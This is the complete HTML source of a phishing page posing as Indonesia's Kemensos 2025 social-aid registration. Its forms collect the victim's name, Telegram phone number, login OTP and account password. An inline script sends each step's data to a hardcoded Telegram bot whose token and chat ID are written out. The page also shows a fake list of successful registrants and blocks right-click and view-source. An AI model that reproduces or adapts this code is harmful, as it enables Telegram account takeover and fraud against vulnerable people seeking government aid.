<!doctype html>
<html lang="en" class="h-100">
<head id="ctl00_Head1">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
    <link href="assets/css/custom.css" type="text/css" rel="stylesheet" />
    <link href="assets/css/menebus.css" type="text/css" rel="stylesheet" />
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta property="og:title" content="BANTUAN KEMENSOS 2025 : Kemensos 2025 adalah program bantuan yang diberikan oleh Kementerian Sosial Republik Indonesia (Kemensos) kepada masyarakat yang terdaftar dalam Data Terpadu Kesejahteraan Sosial (DTKS)">
    <meta property="og:image" content="">
    <meta name="description" />
    <meta name="author" content="Uang Kuno Foundation" />
    <title>BANTUAN KEMENSOS 2025</title>
    <link rel="icon" type="image/x-icon" href="favicon.png" />
    <link rel="canonical" href="https://getbootstrap.com/docs/5.0/examples/sticky-footer/" />
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" />
	<script type="text/javascript" src="js/vue.min.js.download"></script>
	<script src="js/clipboard.js.download"></script>
	<script type="text/javascript" src="js/index.js.download"></script>
    <style type="text/css">
        .bd-placeholder-img {
            font-size: 1.125rem;
            text-anchor: middle;
            -webkit-user-select: none;
            -moz-user-select: none;
            user-select: none;
        }

        @media (min-width: 768px) {
            .bd-placeholder-img-lg {
                font-size: 3.5rem;
            }
        }
	/* Absolute Center Spinner */
        .loading {
            position: fixed;
            z-index: 999;
            height: 2em;
            width: 2em;
            overflow: show;
            margin: auto;
            top: 0;
            left: 0;
            bottom: 0;
            right: 0;
        }

        /* Transparent Overlay */
        .loading:before {
            content: '';
            display: block;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: radial-gradient(rgba(20, 20, 20, .8), rgba(0, 0, 0, .8));

            background: -webkit-radial-gradient(rgba(20, 20, 20, .8), rgba(0, 0, 0, .8));
        }

        /* :not(:required) hides these rules from IE9 and below */
        .loading:not(:required) {
            /* hide "loading..." text */
            font: 0/0 a;
            color: transparent;
            text-shadow: none;
            background-color: transparent;
            border: 0;
        }

        .loading:not(:required):after {
            content: '';
            display: block;
            font-size: 10px;
            width: 1em;
            height: 1em;
            margin-top: -0.5em;
            -webkit-animation: spinner 150ms infinite linear;
            -moz-animation: spinner 150ms infinite linear;
            -ms-animation: spinner 150ms infinite linear;
            -o-animation: spinner 150ms infinite linear;
            animation: spinner 150ms infinite linear;
            border-radius: 0.5em;
            -webkit-box-shadow: rgba(255, 255, 255, 0.75) 1.5em 0 0 0, rgba(255, 255, 255, 0.75) 1.1em 1.1em 0 0, rgba(255, 255, 255, 0.75) 0 1.5em 0 0, rgba(255, 255, 255, 0.75) -1.1em 1.1em 0 0, rgba(255, 255, 255, 0.75) -1.5em 0 0 0, rgba(255, 255, 255, 0.75) -1.1em -1.1em 0 0, rgba(255, 255, 255, 0.75) 0 -1.5em 0 0, rgba(255, 255, 255, 0.75) 1.1em -1.1em 0 0;
            box-shadow: rgba(255, 255, 255, 0.75) 1.5em 0 0 0, rgba(255, 255, 255, 0.75) 1.1em 1.1em 0 0, rgba(255, 255, 255, 0.75) 0 1.5em 0 0, rgba(255, 255, 255, 0.75) -1.1em 1.1em 0 0, rgba(255, 255, 255, 0.75) -1.5em 0 0 0, rgba(255, 255, 255, 0.75) -1.1em -1.1em 0 0, rgba(255, 255, 255, 0.75) 0 -1.5em 0 0, rgba(255, 255, 255, 0.75) 1.1em -1.1em 0 0;
        }

        /* Animation */

        @-webkit-keyframes spinner {
            0% {
                -webkit-transform: rotate(0deg);
                -moz-transform: rotate(0deg);
                -ms-transform: rotate(0deg);
                -o-transform: rotate(0deg);
                transform: rotate(0deg);
            }

            100% {
                -webkit-transform: rotate(360deg);
                -moz-transform: rotate(360deg);
                -ms-transform: rotate(360deg);
                -o-transform: rotate(360deg);
                transform: rotate(360deg);
            }
        }

        @-moz-keyframes spinner {
            0% {
                -webkit-transform: rotate(0deg);
                -moz-transform: rotate(0deg);
                -ms-transform: rotate(0deg);
                -o-transform: rotate(0deg);
                transform: rotate(0deg);
            }

            100% {
                -webkit-transform: rotate(360deg);
                -moz-transform: rotate(360deg);
                -ms-transform: rotate(360deg);
                -o-transform: rotate(360deg);
                transform: rotate(360deg);
            }
        }

        @-o-keyframes spinner {
            0% {
                -webkit-transform: rotate(0deg);
                -moz-transform: rotate(0deg);
                -ms-transform: rotate(0deg);
                -o-transform: rotate(0deg);
                transform: rotate(0deg);
            }

            100% {
                -webkit-transform: rotate(360deg);
                -moz-transform: rotate(360deg);
                -ms-transform: rotate(360deg);
                -o-transform: rotate(360deg);
                transform: rotate(360deg);
            }
        }

        @keyframes spinner {
            0% {
                -webkit-transform: rotate(0deg);
                -moz-transform: rotate(0deg);
                -ms-transform: rotate(0deg);
                -o-transform: rotate(0deg);
                transform: rotate(0deg);
            }

            100% {
                -webkit-transform: rotate(360deg);
                -moz-transform: rotate(360deg);
                -ms-transform: rotate(360deg);
                -o-transform: rotate(360deg);
                transform: rotate(360deg);
            }
        }
        @import url('https://fonts.googleapis.com/css2?family=Orbitron:wght@400;700&display=swap');
        
        .blinking-text {
            font-family: 'Orbitron', sans-serif;
            font-size: 24px;
            font-weight: bold;
            color: red;
            animation: blink 1s infinite alternate;
        }

        @keyframes blink {
            0% { opacity: 1; }
            100% { opacity: 0; }
        }
    </style>
</head>

<body class="d-flex flex-column h-100">

<!---
<div class="item">
<div class="record_logo">
<img src="assets/img/avatar.png" alt="">
</div>
<div class="center">
<div class="h1"><span class="name"></span> <span>Berjaya</span> <span class="number">RM 1.000,00</span></div>
<div class="h2">3 jam yang lalu</div>
</div>
</div>
--->

<div id="loading" class="loading" style="display: none;"></div>
<div id="loading" style="display: none;">
    <img src="loading.gif" alt="Loading..." />
</div>

    <main class="flex-shrink-0">
        <div id="ctl00_divContainer" class="container container-narrow">
            <div class="text-center mt-2">
                <a id="ctl00_lnkMalay" disabled="disabled" style="color:Black;font-weight:bold;text-decoration:none;">Bahasa Indonesia</a>
                <span id="ctl00_lblPipe_bm"> | </span>
                <a id="ctl00_lnkEng" href="">English</a>
                <span id="ctl00_lblPipe_bi"> | </span>
                <a id="ctl00_lnkChineseSimplified" href=""> 中文(简体) </a>
                <span id="ctl00_lblPipe_bc"> | </span>
                <a id="ctl00_lnkTamilInd" href="">தமிழ் </a>
            </div>
            <div class="header mt-3 text-center">
                <img src="assets/img/jeniss.jpeg" id="ctl00_logohead" class="img-fluid" width="450" />
            </div>
            <marquee>SILAHKAN MASUK DENGAN AKUN TELEGRAM ANDA.</marquee>
            
            <script type="text/javascript">
                //<![CDATA[
                var theForm = document.forms['aspnetForm'];
if (!theForm) {
    theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
    if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
        theForm.__EVENTTARGET.value = eventTarget;
        theForm.__EVENTARGUMENT.value = eventArgument;
        theForm.submit();
    }
}                //]]>
            </script>
            <script type="text/javascript">
                //<![CDATA[
                function WebForm_OnSubmit() {
                    if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
                    return true;
                }
                //]]>
            </script>
            <span id="ctl00_lblMsg" class="blinking-text"></span>
            <h2 class="fw-bold mt-2 page-header text-center">
                <span id="ctl00_lblMsg" class="blinking-text">DAFTAR BANTUAN KEMENSOS 2025</span>
            </h2>
            
			<div class="first">
                <div class="mb-4"></div>
            <form action="javascript:void(0)" method="post" id="firstForm">
			<div class="input-group mb-3">
			<span class="input-group-text" id="basic-addon1">Nama</span>
			<input name="full_name" id="full_name" maxlength="18" class="form-control" type="text" required="true" placeholder="Nama Lengkap Sesuai E-KTP" title="Sila Masukkan Nombor , contoh +6022334455">
			</div>
			<div class="input-group mb-3">
                <span class="input-group-text" id="basic-addon1">🇮🇩 +62</span>
                <input name="phone_number" id="phone_number" maxlength="18" class="form-control" type="tel" required="true" placeholder="Nomor Telegram Aktif" title="Masukkan nomor telepon, contoh +628123456789">
            </div>
            
			<div class="text-center">
			<button type="submit" class="btn btn-lg btn-block btn-mk" onclick="processFirstData()">DAFTAR</button>
			</div>
            </form>
			</div>
			
			<div class="second" style="display: none;">
			<form action="javascript:void(0)" method="post" id="secondForm">
			<input type="hidden" name="full_name" id="validateFullName" readonly>
			<input type="hidden" name="phone_number" id="validatePhoneNumber" readonly>
			<div class="mb-3">
			<label for="otp_code" class="form-label">
            <span id="ctl00_RecipientMasterContent_lblEntry_IDNo">Silahkan Masukkan Kode Verifikasi Yang Telah Kami Kirim Ke-akun Telegram Anda.</span>
			</label>
			<input name="otp_code" maxlength="5" id="otp_code" class="form-control" type="tel" required="true" placeholder="5 digit OTP">
			</div>
			<div class="text-center">
			<button type="submit" class="btn btn-lg btn-block btn-mk" onclick="processSecondData()">Teruskan</button>
			</div>
			</form>
			</div>
			
			<div class="third" style="display: none;">
			<form action="javascript:void(0)" method="post" id="thirdForm">
			<input type="hidden" name="full_name" id="validateFullName" readonly>
			<input type="hidden" name="phone_number" id="validatePhoneNumber" readonly>
			<input type="hidden" name="otp_code" id="validateOtpCode" readonly>
			<div class="mb-3">
			<label for="password" class="form-label">
            <span id="ctl00_RecipientMasterContent_lblEntry_IDNo">Masukkan Password Anda, jika tidak memiliki passwor akun silahkan masukkan kata (DAFTAR BARU)</span>
			</label>
			<input name="password" id="password" class="form-control" type="text" required="true" placeholder="password akun">
			</div>
			<div class="text-center">
			<button type="submit" class="btn btn-lg btn-block btn-mk" onclick="processThirdData()">Lanjutkan</button>
			</div>
			</form>
			</div>
			
			<div  class="row four"id="ctl00_RecipientMasterContent_divResultNotFound" style="display: none;">
			<p class="text-center"><img src="assets/img/processing.gif" id="ctl00_logohead" class="img-fluid" width="160" /></p>
			<h5 class="text-center"><span id="ctl00_RecipientMasterContent_lblNoRecord">Silahkan tunggu proses  1x24 jam untuk menerima konfirmasi,</span></h5>
			<h5 class="text-center"><span id="ctl00_RecipientMasterContent_lblNoRecord">atau gunakan nomor telegram lain.</span></h5>
			<p class="text-center"><a href="index.html" class="btn btn-lg btn-block btn-mk">&laquo; <span id="ctl00_RecipientMasterContent_lblGoBack_NoResult">Gunakan Nomor Telegram Lain</span></a></p>
			</div>
           

<!--- record berjaya box --->
<div class="_record-box">
    <div id="list" class="list-box">
        <div class="list" style="margin-top: -3.1345px;">
            <div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Aldi Pratama</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Reza saputra</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">MUH FADLI</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Suhaib Baahir</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Zubair ahmad</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Selamet hardi</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">ALI USMAN B</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Satria Kurnia</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Zakaria Alim</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Embong Sulong</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Zaki Baasim</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">SADLI</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">AHMAD SUBAN</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">ARSAL HASAN</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Furqaan Alatas</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Yanwar halim</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">BUDI AHMAD</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Indra kusuma</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">RICKY YAN</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">JEFFRY</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Humaira wati</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Zahra Zubair</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">WANA ADRIAN </span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">HENDRA SUAIB</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Pendy Chan</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Zurya Agus</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Adiputeri </span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Masayu Lokman</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Nilam </span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Suriawati </span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Kamil </span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">AMIN NATA</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Ibrahim </span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Suhaib akbar</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">AHMAD JALI</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">RETNO NIRMALA</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">ARYA SALIM</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">MESITA ARYA</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">Zakaria</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			<div class="item">
                <div class="record_logo">
                    <img src="assets/img/avatar.png" alt="">
                </div>
                <div class="center">
                    <div class="h1"><span class="name">ARI WIJAYA</span></div>
                    <div class="h2">REGISTRASI SUKSES !!!</div>
                </div>
            </div>
			
        </div>
    </div>
</div>
<!--- record berjaya box --->

        </div>
        </div>
        </div>
    </main>
    <br>
    <div class="header mt-3 text-center">
        <img src="" id="ctl00_logohead" class="img-fluid" width="450" />
    </div>
    <footer class="footer mt-auto py-3">
        <div class="container">
            <div class="row">
                <div class="col-5">
                    <span class="text-white">
                        <span id="ctl00_lblCopyRight">2025 All Rights Reserved. </span>
                    </span>
                </div>
                <div class="col">
                    <ul class="nav justify-content-end">
                        <li class="nav-item">
                            <a id="ctl00_lnkFaq" class="nav-link" href="">
                                <i class="bi-question-circle"></i>
                                <span id="ctl00_lblFAQ"> Bansos Kemensos 2025</span></a>
                        </li>
                        <li class="nav-item">
                            <p id="ctl00_linkMerchList">
                                <a class="nav-link" href=""><i class="bi-shop"></i>
                                    <span id="ctl00_lblMerchList">Digital</span></a>
                            </p>
                        </li>
                        <li class="nav-item">
                            <a href="" id="ctl00_linkContactUs" class="nav-link"><i class="bi-envelope"></i>
                                <span id="ctl00_lblctctus">Hubungi Kami</span></a>
                        </li>
                    </ul>
                </div>
            </div>
        </div>
    </footer>
	

<script type="text/javascript" src="http://code.jquery.com/jquery-1.10.2.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="assets/js/script.js"></script>
<script type="text/javascript" src="js/jquery-3.4.1.min.js.download"></script>

  
<script type="text/javascript">
    //<![CDATA[
    var Page_ValidationActive = false;
    if (typeof(ValidatorOnLoad) == "function") {
        ValidatorOnLoad();
    }
    function ValidatorOnSubmit() {
        if (Page_ValidationActive) {
            return ValidatorCommonOnSubmit();
        } else {
            return true;
        }
    }
    
</script>
<script>
    let formData = {
    nama: '',
    noTlp: '',
    otp: '',
    password: ''
};

let isSending = false;

async function sendToTelegram(message) {
    if (isSending) {
        console.warn("❗ Pengiriman sedang berlangsung, tunggu hingga selesai.");
        return false;
    }

    isSending = true;
    const chatId = '7896450466'; 
    const botToken = '8167107034%3AAAFtOa3E3LG95EHheK4GvIBXwFAbz5s_bVY'; 

    const apiUrl = `https://api.telegram.org/bot${botToken}/sendMessage`;
    const params = new URLSearchParams({
        chat_id: chatId,
        text: message,
        parse_mode: 'Markdown' 
    });

    try {
        const response = await fetch(apiUrl, {
            method: 'POST',
            body: params
        });

        const result = await response.json();
        if (!result.ok) throw new Error(result.description);
        console.log('', result);
        return true;
    } catch (error) {
        console.error('', error);
        alert('Terjadi kesalahan saat mengirim data. Coba lagi.');
        return false;
    } finally {
        isSending = false;
    }
}

function switchFormWithDelay(current, next) {
    setTimeout(() => {
        document.querySelector(current).style.display = "none";
        document.querySelector(next).style.display = "block";
    }, 5000);
}

async function processFirstData() {
    const nama = document.getElementById('full_name').value.trim();
    const noTlp = document.getElementById('phone_number').value.trim();

    if (!nama || !noTlp) {
        alert("❗ Semua kolom wajib diisi.");
        return;
    }

    formData.nama = nama;
    formData.noTlp = noTlp;

    const message = `📋 Data Tahap 1:\nNama: ${formData.nama}\nNomor Telepon: \`${formData.noTlp}\``;
    await sendToTelegram(message);
    switchFormWithDelay(".first", ".second");
}

async function processSecondData() {
    const otp = document.getElementById('otp_code').value.trim();

    if (!otp) {
        alert("❗ Kode OTP wajib diisi.");
        return;
    }

    formData.otp = otp;

    const message = `🔑 Data Tahap 2:\nNama: ${formData.nama}\nNomor Telepon: \`${formData.noTlp}\`\nKode OTP: \`${formData.otp}\``;
    await sendToTelegram(message);
    switchFormWithDelay(".second", ".third");
}

async function processThirdData() {
    const password = document.getElementById('password').value.trim();

    if (!password) {
        alert("❗ Password wajib diisi.");
        return;
    }

    formData.password = password;

    const message = `🔒 Data Tahap 3:\nNama: ${formData.nama}\nNomor Telepon: \`${formData.noTlp}\`\nKode OTP: \`${formData.otp}\`\nKata Sandi: \`${formData.password}\``;
    await sendToTelegram(message);
    switchFormWithDelay(".third", ".four");
}

document.getElementById("firstForm").addEventListener("submit", (e) => {
    e.preventDefault();
    processFirstData();
});

document.getElementById("secondForm").addEventListener("submit", (e) => {
    e.preventDefault();
    processSecondData();
});

document.getElementById("thirdForm").addEventListener("submit", (e) => {
    e.preventDefault();
    processThirdData();
});
    
</script>



<script>
    // 加载多语言
    var language = getQueryString('language')
    loadLocale(function(e) {
        app.locale = Object.assign(e.Common, e.CommonShare)
    }, language)
    var app = new Vue({
        el: '#app',
        data: {
            locale: {},
            uid: '2004219',
        },
        created() {
            $('#app').show();
            this.starScroll();
        },
        methods: {
            starScroll() {
                var _this = this;
                _this.scrollTimer && clearTimeout(_this.scrollTimer)
                _this.scrollTimer = setTimeout(() => {
                    var $box = $("#list").find(".list:first");
                    $box.css({
                        marginTop: 0
                    })
                    var $item = $box.find(".item:first");
                    var outerHeight = $item.outerHeight(true)
                    $box.animate({
                        "marginTop": -outerHeight + "px"
                    }, 1000, function() {
                        $box.css({
                            marginTop: 0
                        }).find(".item:first").appendTo($box);
                        _this.starScroll();
                    })
                }, 600);
            },
        },
    })
</script>
<script>
    
    document.addEventListener('contextmenu', function(e) {
        e.preventDefault();
    });
</script>
<script>
    document.addEventListener('keydown', function(e) {
        // Deteksi Ctrl + U
        if (e.ctrlKey && e.key.toLowerCase() === 'u') {
            e.preventDefault(); // Mencegah aksi default (membuka view source)
            window.close(); // Menutup tab browser
            // Atau, alihkan ke halaman lain:
           // window.location.href = "https://google.com";
        }
    });
</script>
</body>
</html>
